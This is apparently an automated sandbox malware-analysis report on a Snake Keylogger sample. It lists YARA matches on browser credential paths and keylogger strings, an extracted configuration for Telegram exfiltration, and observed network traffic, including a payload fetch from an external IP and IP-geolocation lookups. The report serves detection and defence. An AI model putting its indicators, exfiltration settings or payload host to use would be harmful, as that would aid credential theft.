7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b23e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a427:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a86e:$a4: \Orbitum\User Data\Default\Login Data 0x1b9ef:$a5: \Kometa\User Data\Default\Login Data
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1943e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18627:$a3: \Google\Chrome\User Data\Default\Login Data 0x18a6e:$a4: \Orbitum\User Data\Default\Login Data 0x19bef:$a5: \Kometa\User Data\Default\Login Data
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12b24:$s1: UnHook 0x12b2b:$s2: SetHook 0x12b33:$s3: CallNextHook 0x12b40:$s4: _hook
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16b3e:$x1: $%SMTPDV$ 0x1577e:$x2: $#TheHashHere%& 0x16ae6:$x3: %FTPDV$ 0x15760:$x4: $%TelegramDv$ 0x131ac:$x5: KeyLoggerEventArgs 0x1353c:$x5: KeyLoggerEventArgs 0x16b6a:$m1: \| Snake Keylogger 0x16c10:$m1: \| Snake Keylogger 0x16d64:$m1: \| Snake Keylogger 0x16e8a:$m1: \| Snake Keylogger 0x16fe4:$m1: \| Snake Keylogger 0x16b0a:$m2: Clipboard Logs ID 0x16d1a:$m2: Screenshot Logs ID 0x16e2e:$m2: keystroke Logs ID 0x1701a:$m3: SnakePW 0x16cf2:$m4: \SnakeKeylogger\
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14924:$s1: UnHook 0x1492b:$s2: SetHook 0x14933:$s3: CallNextHook 0x14940:$s4: _hook
1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1893e:$x1: $%SMTPDV$ 0x1757e:$x2: $#TheHashHere%& 0x188e6:$x3: %FTPDV$ 0x17560:$x4: $%TelegramDv$ 0x14fac:$x5: KeyLoggerEventArgs 0x1533c:$x5: KeyLoggerEventArgs 0x1896a:$m1: \| Snake Keylogger 0x18a10:$m1: \| Snake Keylogger 0x18b64:$m1: \| Snake Keylogger 0x18c8a:$m1: \| Snake Keylogger 0x18de4:$m1: \| Snake Keylogger 0x1890a:$m2: Clipboard Logs ID 0x18b1a:$m2: Screenshot Logs ID 0x18c2e:$m2: keystroke Logs ID 0x18e1a:$m3: SnakePW 0x18af2:$m4: \SnakeKeylogger\
Click to see the 54 entries

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, QueryName: checkip.dyndns.org

Source: Process started

Author: frack113: Data: Command: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, CommandLine: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, NewProcessName: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, OriginalFileName: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe" , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, ParentProcessId: 6780, ParentProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, ProcessCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, ProcessId: 6444, ProcessName: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "l0gs.l@yandex.com", "Telegram ID": "333bukis"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Virustotal: Detection: 15%			Perma Link
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	ReversingLabs: Detection: 26%

Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	Avira: Label: TR/ATRAPS.Gen

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.7:49787 version: TLS 1.0

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175CBC0h	7_2_0175C1D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175D5E8h	7_2_0175D1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175E43Fh	7_2_0175E183
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175E89Fh	7_2_0175E5E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175ECFFh	7_2_0175EA40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175D021h	7_2_0175CD60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175DFDFh	7_2_0175DD21
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175D5E8h	7_2_0175D1C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 0175D5E8h	7_2_0175D516
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0175B6F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0175BD2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0175BF0C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06922979h	7_2_069226D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06925991h	7_2_069256E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 069236A9h	7_2_06923400
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06924832h	7_2_06924588
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06925539h	7_2_06925290
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06926699h	7_2_069263F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 069243B1h	7_2_06924108
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 069250E1h	7_2_06924E38
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06926241h	7_2_06925F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06923251h	7_2_06922FA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06923F59h	7_2_06923CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06922DF9h	7_2_06922B50
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06925DE9h	7_2_06925B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06923B01h	7_2_06923858
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then jmp 06924C89h	7_2_069249E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_069208F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_069208E0

Networking

May check the online IP address of the machine

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	DNS query: name: checkip.dyndns.org

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /xml/84.17.52.15 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fact_Sptqaevl.bmp HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7
Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7

Source: unknown

HTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.7:49787 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.163

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434130725.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.163
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	String found in binary or memory: http://45.137.22.163/fact_Sptqaevl.bmp
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org4Wk
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgD8Wk
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343970788.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.344073212.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.344104653.0000000005F6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://en.w8u
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343103831.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343632448.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343298180.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343363099.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343219300.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343171831.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343486314.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343430970.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343328345.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.343398665.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606555981.0000000003337000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://freegeoip.app
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434130725.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606451041.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com6
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comC
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comCo
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comCoi
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comTC
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comTC1
